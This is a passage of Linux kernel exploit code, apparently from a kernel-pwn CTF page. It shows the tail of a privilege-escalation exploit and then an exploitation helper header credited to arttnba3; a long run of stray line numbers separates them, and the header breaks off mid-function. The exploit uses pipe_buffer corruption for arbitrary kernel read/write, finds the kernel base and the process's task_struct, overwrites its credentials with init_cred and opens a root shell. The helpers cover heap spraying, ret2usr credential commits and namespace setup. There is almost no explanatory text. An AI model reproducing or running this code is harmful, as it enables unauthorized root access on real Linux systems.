write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
//sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

vmemmap_base = (size_t)info_pipe_buf.page & 0xfffffffff0000000;
printf("vmemmap_start: 0x%lx\n",vmemmap_base);
for (;;)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + 157 * 0x40), buf);
//printf("%lx\n",*(size_t*)buf);
if (*(uint64_t *)buf > 0xffffffff81000000 && ((*(uint64_t *)buf & 0xfff) == 0x070))
{
kernel_base = *(uint64_t *)buf - 0x070;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("\033[32m\033[1m[+] Found kernel base: \033[0m0x%lx\n"
"\033[32m\033[1m[+] Kernel offset: \033[0m0x%lx\n",
kernel_base, kernel_offset);
break;
}

vmemmap_base -= 0x10000000;
}
printf("\033[32m\033[1m[+] vmemmap_base:\033[0m 0x%lx\n\n", vmemmap_base);

uint64_t parent_task, current_task;
puts("[*] Seeking task_struct in memory...");

uint64_t *comm_addr = 0;
uint64_t *point_buf = malloc(0x1000);

char target[0x20];
strcpy(target, "8888888888");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0){
err_exit("cannot set name");
}

for (int i = 0; 1; i++)
{
arbitrary_read_by_pipe((struct page *)(vmemmap_base + i * 0x40), point_buf);

comm_addr = memmem(point_buf, 0xf00, target, strlen(target));
if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-57] > 0xffff888000000000) /* task->read_parent */
&& (comm_addr[-56] > 0xffff888000000000)) /* task->parent */
{
parent_task = comm_addr[-57];

current_task = comm_addr[-50] - 2528;
page_offset_base = (comm_addr[-50] & 0xfffffffffffff000) - i * 0x1000;
page_offset_base &= 0xfffffffff0000000;

printf("\033[32m\033[1m[+] Found task_struct on page: \033[0m%p\n",
(struct page *)(vmemmap_base + i * 0x40));
printf("\033[32m\033[1m[+] page_offset_base: \033[0m0x%lx\n",
page_offset_base);
printf("\033[34m\033[1m[*] current task_struct's addr: \033[0m0x%lx\n",
current_task);
printf("\033[34m\033[1m[*] parent task_struct's addr: \033[0m0x%lx\n\n",
parent_task);
break;
}
}

puts("[*] Seeking for init_task...");
uint64_t *tsk_buf;
/* 调试时通过解析task_struct->parent(offset=309*8)的方式向上一直找到init进程 */
uint64_t init_task = kernel_offset + 0xffffffff8301bb80;
uint64_t init_cred = kernel_offset + 0xffffffff83079ee8; // task->cred(offset=363*8)
uint64_t init_nsproxy = kernel_offset + 0xffffffff83079b40; // task->nsproxy (offset=377*8)
//sleep(5);

printf("\033[32m\033[1m[+] Found init_task: \033[0m0x%lx\n", init_task);
printf("\033[32m\033[1m[+] Found init_cred: \033[0m0x%lx\n", init_cred);
printf("\033[32m\033[1m[+] Found init_nsproxy:\033[0m0x%lx\n", init_nsproxy);

puts("[*] Escalating ROOT privilege now...");

size_t current_task_page = direct_map_addr_to_page_addr(current_task);

arbitrary_read_by_pipe((struct page *)current_task_page, buf);
arbitrary_read_by_pipe((struct page *)(current_task_page + 0x40), &buf[512 * 8]);

tsk_buf = (size_t *)((size_t)buf + (current_task & 0xfff));
tsk_buf[363] = init_cred;
tsk_buf[364] = init_cred;
tsk_buf[377] = init_nsproxy;

arbitrary_write_by_pipe((struct page *)current_task_page, buf, 0xff0);
arbitrary_write_by_pipe((struct page *)(current_task_page + 0x40),&buf[512 * 8], 0xff0);

puts("[+] Done.\n");
puts("[*] checking for root...");

get_root_shell();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
/**
* @file kernel.h
* @author arttnba3 (arttnba@gmail.com)
* @brief arttnba3's personal utils for kernel pwn
* @version 1.1
* @date 2023-05-20
*
* @copyright Copyright (c) 2023 arttnba3
*
*/
#ifndef A3_KERNEL_PWN_H
#define A3_KERNEL_PWN_H

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

/**
* I - fundamental functions
* e.g. CPU-core binder, user-status saver, etc.
*/

uint64_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
uint64_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
uint64_t init_task, init_nsproxy, init_cred;

/**
 * @brief Map an address inside the direct mapping to the address of its
 *        struct page entry.
 *
 * The address is rounded down to a 4 KiB boundary, turned into a page index
 * relative to page_offset_base, and that index selects a 0x40-byte entry
 * starting at vmemmap_base.
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & (~0xfff);
    size_t page_index = (page_start - page_offset_base) / 0x1000;

    return vmemmap_base + page_index * 0x40;
}

/**
 * @brief Hex-dump a buffer, eight bytes per row.
 *
 * Each row shows the row offset, the eight bytes individually, and the same
 * eight bytes as one native-endian 64-bit value.
 *
 * @param p    start of the buffer to dump
 * @param size number of bytes to dump; must be a multiple of 8
 * @return 0 after printing, 1 (nothing printed) if size is not a multiple of 8
 */
int print_hex(void *p, int size){
    /* Rows are always 8 bytes wide, independent of the pointer size. */
    enum { ROW_BYTES = 8 };
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if (size % ROW_BYTES)
    {
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += ROW_BYTES){
        uint64_t word;

        /* memcpy avoids an unaligned, aliasing-violating load from the byte buffer */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%llx\n",
               i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7],
               (unsigned long long)word);
    }
    return 0;
}

/**
 * @brief Report a fatal error and terminate.
 *
 * Prints msg with a red "[x] Error at:" prefix on stdout, waits five seconds
 * so the message stays visible, then exits with EXIT_FAILURE.
 */
void err_exit(char *msg)
{
    enum { ERR_EXIT_DELAY_SEC = 5 };

    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(ERR_EXIT_DELAY_SEC);

    exit(EXIT_FAILURE);
}

/*
 * Check whether the process now runs with uid 0 and, if so, start /bin/sh.
 * Never returns: exits with EXIT_FAILURE (after a 5 s pause) when the uid is
 * non-zero, and with EXIT_SUCCESS once the shell has finished.
 */
void get_root_shell(void)
{
    puts("[*] Checking for root...");

    if (getuid() == 0) {
        puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
        puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

        system("/bin/sh");

        /* leave through exit() so the process ends normally, not by a fault */
        exit(EXIT_SUCCESS);
    }

    puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Userspace status saver: copies the current cs, ss, rsp and flags registers
 * into the globals user_cs, user_ss, user_sp and user_rflags.
 *
 * The asm operands are written destination-first (Intel order).
 * NOTE(review): presumably this requires building with -masm=intel — confirm
 * against the build flags.
 */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"            /* push the flags register ... */
"pop user_rflags;"  /* ... and pop it into user_rflags */
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Bind the calling process to a single CPU core.
 *
 * core: index of the CPU to pin to.
 *
 * The result of sched_setaffinity() is checked: on failure a warning with the
 * errno text is printed and the success message is suppressed, so the log
 * never claims a binding that did not happen. The function still returns
 * normally in both cases.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        printf("\033[31m\033[1m[x] Failed to bind process to core \033[0m%d: %s\n",
               core, strerror(errno));
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * for ret2usr attacker: treat the two arguments as function addresses and
 * call commit_creds(prepare_kernel_cred(NULL)) through them.
 */
void get_root_privilige(size_t prepare_kernel_cred, size_t commit_creds)
{
    typedef void *(*prepare_fn)(void *);
    typedef int (*commit_fn)(void *);

    prepare_fn make_cred = (prepare_fn) prepare_kernel_cred;
    commit_fn apply_cred = (commit_fn) commit_creds;
    void *new_cred = (*make_cred)(NULL);

    (*apply_cred)(new_cred);
}

/**
 * @brief Move the caller into fresh mount, user and network namespaces.
 *
 * After unshare(), writes "deny" to /proc/self/setgroups and then a
 * single-entry "0 <id> 1" mapping to uid_map and gid_map. No return value is
 * checked; every step is best-effort.
 *
 * Note that the caller **SHOULD NOT** be the process used to obtain root; it
 * is meant only as an operator for basic setup work inside the namespace.
 *
 * NOTE(review): getuid()/getgid() are read after unshare(); inside a new user
 * namespace with no mapping yet they may report the overflow ID rather than
 * the original one — confirm this is intended.
 */
void unshare_setup(void)
{
    char line[0x100];
    const char *deny = "deny";
    int proc_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    proc_fd = open("/proc/self/setgroups", O_WRONLY);
    write(proc_fd, deny, strlen(deny));
    close(proc_fd);

    /* pass 0 writes uid_map, pass 1 writes gid_map */
    for (int pass = 0; pass < 2; pass++) {
        proc_fd = open(pass == 0 ? "/proc/self/uid_map" : "/proc/self/gid_map",
                       O_WRONLY);
        snprintf(line, sizeof(line), "0 %d 1",
                 pass == 0 ? getuid() : getgid());
        write(proc_fd, line, strlen(line));
        close(proc_fd);
    }
}

/**
 * II - fundamental kernel structures
 * e.g. list_head
 */
/* doubly linked list node; both links are kept as raw 64-bit values */
struct list_head {
uint64_t next;
uint64_t prev;
};

/**
 * III - pgv pages sprayer related
 * Note that we should create two processes:
 * - the parent is the one that sends commands and gets root
 * - the child creates an isolated namespace by calling unshare_setup(),
 * receives commands from the parent and only carries them out
 */
/* number of slots in the child's socket fd table (see spray_cmd_handler()) */
#define PGV_PAGE_NUM 1000
/* setsockopt() option names passed at level SOL_PACKET */
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/*
 * Command record sent from the parent to the spraying child.
 * Each allocation is (size * nr) bytes, aligned to PAGE_SIZE.
 */
struct pgv_page_request {
/* slot in the child's socket fd table */
int idx;
/* one of the CMD_* values */
int cmd;
/* becomes tp_block_size of the ring request */
unsigned int size;
/* becomes tp_block_nr of the ring request */
unsigned int nr;
};

/* operation types carried in pgv_page_request.cmd */
enum {
/* create a packet socket and set up its ring */
CMD_ALLOC_PAGE,
/* close the socket stored at the given index */
CMD_FREE_PAGE,
/* make the child's command loop terminate */
CMD_EXIT,
};

/*
 * Pipes for command communication:
 * cmd_pipe_req carries requests parent -> child,
 * cmd_pipe_reply carries the int result child -> parent.
 */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/**
 * Create a packet socket and attach a TX ring of `nr` blocks of `size`
 * bytes each to it.
 *
 * @param size block size in bytes (tp_block_size)
 * @param nr   number of blocks (tp_block_nr)
 * @return the socket fd on success; on failure the negative result of the
 *         failing socket()/setsockopt() call (the socket is closed first)
 */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req ring;
    int tp_version = TPACKET_V1;
    int fd;
    int rc;

    fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (fd < 0) {
        printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        return fd;
    }

    /* select the ring layout version before requesting the ring */
    rc = setsockopt(fd, SOL_PACKET, PACKET_VERSION,
                    &tp_version, sizeof(tp_version));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_VERSION)\n");
        close(fd);
        return rc;
    }

    memset(&ring, 0, sizeof(ring));
    ring.tp_block_size = size;
    ring.tp_block_nr = nr;
    ring.tp_frame_size = 0x1000;
    ring.tp_frame_nr = (ring.tp_block_size * ring.tp_block_nr)
                       / ring.tp_frame_size;

    rc = setsockopt(fd, SOL_PACKET, PACKET_TX_RING, &ring, sizeof(ring));
    if (rc < 0) {
        printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
        close(fd);
        return rc;
    }

    return fd;
}

/**
 * Create a TPACKET_V3 packet socket with an RX ring and bind it to the
 * "lo" interface.
 *
 * @param block_size  size of one ring block
 * @param frame_size  size of one frame
 * @param block_nr    number of blocks
 * @param sizeof_priv value for tp_sizeof_priv
 * @param timeout     value for tp_retire_blk_tov
 * @return the bound socket fd; any failure is reported with perror() and
 *         terminates the process with exit(1)
 */
int packet_socket_setup(uint32_t block_size, uint32_t frame_size,
                        uint32_t block_nr, uint32_t sizeof_priv, int timeout) {
    struct tpacket_req3 ring;
    struct sockaddr_ll addr;
    int tp_version = TPACKET_V3;
    int fd;

    fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < 0) {
        perror("[-] socket (AF_PACKET)");
        exit(1);
    }

    if (setsockopt(fd, SOL_PACKET, PACKET_VERSION,
                   &tp_version, sizeof(tp_version)) < 0) {
        perror("[-] setsockopt (PACKET_VERSION)");
        exit(1);
    }

    memset(&ring, 0, sizeof(ring));
    ring.tp_block_size = block_size;
    ring.tp_block_nr = block_nr;
    ring.tp_frame_size = frame_size;
    ring.tp_frame_nr = (block_size * block_nr) / frame_size;
    ring.tp_retire_blk_tov = timeout;
    ring.tp_sizeof_priv = sizeof_priv;
    ring.tp_feature_req_word = 0;

    if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &ring, sizeof(ring)) < 0) {
        perror("[-] setsockopt (PACKET_RX_RING)");
        exit(1);
    }

    memset(&addr, 0, sizeof(addr));
    addr.sll_family = PF_PACKET;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_ifindex = if_nametoindex("lo");
    addr.sll_hatype = 0;
    addr.sll_pkttype = 0;
    addr.sll_halen = 0;

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("[-] bind (AF_PACKET)");
        exit(1);
    }

    return fd;
}

/**
 * Parent side: ask the spraying child to allocate pages.
 *
 * Sends a CMD_ALLOC_PAGE request over cmd_pipe_req and waits for the int
 * reply on cmd_pipe_reply.
 *
 * @param idx  slot in the child's socket table that will hold the socket
 * @param size block size in bytes
 * @param nr   number of blocks
 * @return the value reported by the child, or -1 when the request could not
 *         be sent or the reply could not be read in full (previously an
 *         uninitialised value was returned in that case)
 */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        return -1;
    }

    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * Parent side: ask the spraying child to release the pages at `idx`.
 *
 * Sends a CMD_FREE_PAGE request over cmd_pipe_req and waits for the int
 * reply on cmd_pipe_reply.
 *
 * @param idx slot in the child's socket table whose socket is closed
 * @return the value reported by the child, or -1 when the request could not
 *         be sent or the reply could not be read in full (previously an
 *         uninitialised value was returned in that case)
 */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret = -1;

    if (write(cmd_pipe_req[1], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
        return -1;
    }

    if (read(cmd_pipe_reply[0], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
        return -1;
    }

    return ret;
}

/**
 * Child side: command loop serving requests from the parent.
 *
 * Sets up the isolated namespace, then reads pgv_page_request records from
 * cmd_pipe_req and answers each one with an int on cmd_pipe_reply:
 *  - CMD_ALLOC_PAGE: result of create_socket_and_alloc_pages(), also stored
 *    in the socket table at req.idx
 *  - CMD_FREE_PAGE: result of close() on the stored socket
 *  - CMD_EXIT: 0, after which the loop ends
 *  - anything else, or an index outside [0, PGV_PAGE_NUM): -1
 *
 * The loop also ends when a request cannot be read in full or a reply cannot
 * be written, instead of re-running a stale request.
 */
void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* unused slots hold -1 so freeing them is a harmless close(-1) */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolated namespace */
    unshare_setup();

    /* handle requests */
    for (;;) {
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t) sizeof(req)) {
            break;
        }

        ret = -1;

        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
            break;
        case CMD_FREE_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid index: %d\n", req.idx);
                break;
            }
            ret = close(socket_fd[req.idx]);
            socket_fd[req.idx] = -1;
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        if (write(cmd_pipe_reply[1], &ret, sizeof(ret)) != (ssize_t) sizeof(ret)) {
            break;
        }

        if (req.cmd == CMD_EXIT) {
            break;
        }
    }
}

#define PIPE_SPRAY_NUM 200

/*
 * Layout of the child's socket table as used by prepare_pgv_pages():
 * the 1-page sockets come first, followed by the 4-page sockets and
 * then the 8-page sockets.
 */
#define PGV_1PAGE_SPRAY_NUM 0x20

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

/* running cursors; prepare_pgv_pages() advances the first two as it frees */
int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/**
 * Init the pgv-exploit subsystem :)
 *
 * Creates the request/reply pipes and forks the child that serves page
 * spraying commands. The parent returns to the caller.
 *
 * The child never returns from this function: once spray_cmd_handler()
 * finishes it exits, so it cannot fall through into the parent's code path.
 * A failing pipe() or fork() is fatal and reported through err_exit().
 */
void prepare_pgv_system(void)
{
    pid_t child;

    /* pipes for pgv commands and replies */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        err_exit("pipe for pgv");
    }

    /* child process for pages spray */
    child = fork();
    if (child < 0) {
        err_exit("fork for pgv");
    }

    if (child == 0) {
        spray_cmd_handler();
        exit(EXIT_SUCCESS);
    }
}

/**
 * Spray the pgv pages used for page-level heap fengshui.
 *
 * Order-0 and order-2 pages are sprayed first. While the order-3 pages are
 * being sprayed, some of those earlier pages are freed again at fixed
 * intervals so that the objects allocated alongside each new socket can be
 * served from them instead of disturbing the order-3 allocations.
 */
void prepare_pgv_pages(void)
{
    int n;

    /**
     * We want a cleaner, more contiguous memory layout here, which requires
     * keeping the noise low while allocating order-3 pages.
     * So we pre-allocate the pages for those noisy objects here.
     */
    puts("[*] spray pgv order-0 pages...");
    for (n = 0; n < PGV_1PAGE_SPRAY_NUM; n++) {
        int rc = alloc_page(n, 0x1000, 1);

        if (rc < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", n);
        }
    }

    puts("[*] spray pgv order-2 pages...");
    for (n = 0; n < PGV_4PAGES_SPRAY_NUM; n++) {
        int rc = alloc_page(PGV_4PAGES_START_IDX + n, 0x1000 * 4, 1);

        if (rc < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", n);
        }
    }

    /* spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (n = 0; n < PGV_8PAGES_SPRAY_NUM; n++) {
        /* a socket needs 1 obj: sock_inode_cache, 19 objs per slub of 4 pages */
        if (n % 19 == 0) {
            free_page(pgv_4pages_start_idx);
            pgv_4pages_start_idx++;
        }

        /* a socket needs 1 dentry: 21 objs per slub of 1 page */
        if (n % 21 == 0) {
            pgv_1page_start_idx += 2;
            free_page(pgv_1page_start_idx);
        }

        /* a pgv needs 1 obj: kmalloc-8, 512 objs per slub of 1 page */
        if (n % 512 == 0) {
            pgv_1page_start_idx += 2;
            free_page(pgv_1page_start_idx);
        }

        if (alloc_page(PGV_8PAGES_START_IDX + n, 0x1000 * 8, 1) < 0) {
            printf("[x] failed to create %d socket for pages spraying!\n", n);
        }
    }

    puts("");
}

/**
 * IV - keyctl related
 */

/**
 * MUSL also doesn't ship `keyctl.h` :(
 * Luckily we only need a few macros for exploitation,
 * so defining them directly is fine :)
 */

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/**
 * Add a key of type "user" to the process keyring.
 *
 * @param description key description
 * @param payload     key payload
 * @param plen        payload length in bytes
 * @return result of the add_key syscall, truncated to int
 */
int key_alloc(char *description, void *payload, size_t plen)
{
    long rc = syscall(__NR_add_key, "user", description, payload, plen,
                      KEY_SPEC_PROCESS_KEYRING);

    return rc;
}

/**
 * Replace the payload of an existing key (KEYCTL_UPDATE).
 *
 * @param keyid   id of the key to update
 * @param payload new payload
 * @param plen    payload length in bytes
 * @return result of the keyctl syscall, truncated to int
 */
int key_update(int keyid, void *payload, size_t plen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);

    return rc;
}

/**
 * Read the payload of a key (KEYCTL_READ).
 *
 * @param keyid  id of the key to read
 * @param buffer destination buffer
 * @param buflen size of the destination buffer
 * @return result of the keyctl syscall, truncated to int
 */
int key_read(int keyid, void *buffer, size_t buflen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);

    return rc;
}

/**
 * Revoke a key (KEYCTL_REVOKE).
 *
 * @param keyid id of the key to revoke
 * @return result of the keyctl syscall, truncated to int
 */
int key_revoke(int keyid)
{
    /* the trailing zero arguments are passed exactly as before */
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);

    return rc;
}

/**
 * Unlink a key from the process keyring (KEYCTL_UNLINK).
 *
 * @param keyid id of the key to unlink
 * @return result of the keyctl syscall, truncated to int
 */
int key_unlink(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UNLINK, keyid,
                      KEY_SPEC_PROCESS_KEYRING);

    return rc;
}

/**
 * V - sk_buff spraying related
 * Note that the tail of an sk_buff carries a 320-byte skb_shared_info.
 */
/* number of socket pairs used for spraying */
#define SOCKET_NUM 8
/* number of writes (sk_buffs) issued per socket pair */
#define SK_BUFF_NUM 128

/**
 * The socket array should be defined like:
 * int sk_sockets[SOCKET_NUM][2];
 */

/**
 * Create the SOCKET_NUM AF_UNIX stream socket pairs used to spray sk_buff.
 *
 * @param sk_socket array receiving the two fds of every pair
 * @return 0 on success, -1 as soon as one socketpair() call fails
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    int pair = 0;

    while (pair < SOCKET_NUM) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[pair]) < 0) {
            printf("[x] failed to create no.%d socket pair!\n", pair);
            return -1;
        }
        pair++;
    }

    return 0;
}

/**
 * Spray sk_buff by writing `buf` SK_BUFF_NUM times into the first end of
 * every socket pair.
 *
 * @param sk_socket socket pairs prepared by init_socket_array()
 * @param buf       data to send
 * @param size      number of bytes per write
 * @return 0 on success, -1 on the first failing write
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    /* one flat counter walks the pairs in the same order as a nested loop */
    for (int k = 0; k < SOCKET_NUM * SK_BUFF_NUM; k++) {
        int pair = k / SK_BUFF_NUM;
        int nth = k % SK_BUFF_NUM;

        if (write(sk_socket[pair][0], buf, size) < 0) {
            printf("[x] failed to spray %d sk_buff for %d socket!", nth, pair);
            return -1;
        }
    }

    return 0;
}

/**
 * Release the sprayed sk_buff by reading SK_BUFF_NUM times from the second
 * end of every socket pair.
 *
 * @param sk_socket socket pairs prepared by init_socket_array()
 * @param buf       scratch buffer receiving the data
 * @param size      number of bytes per read
 * @return 0 on success, -1 on the first failing read
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
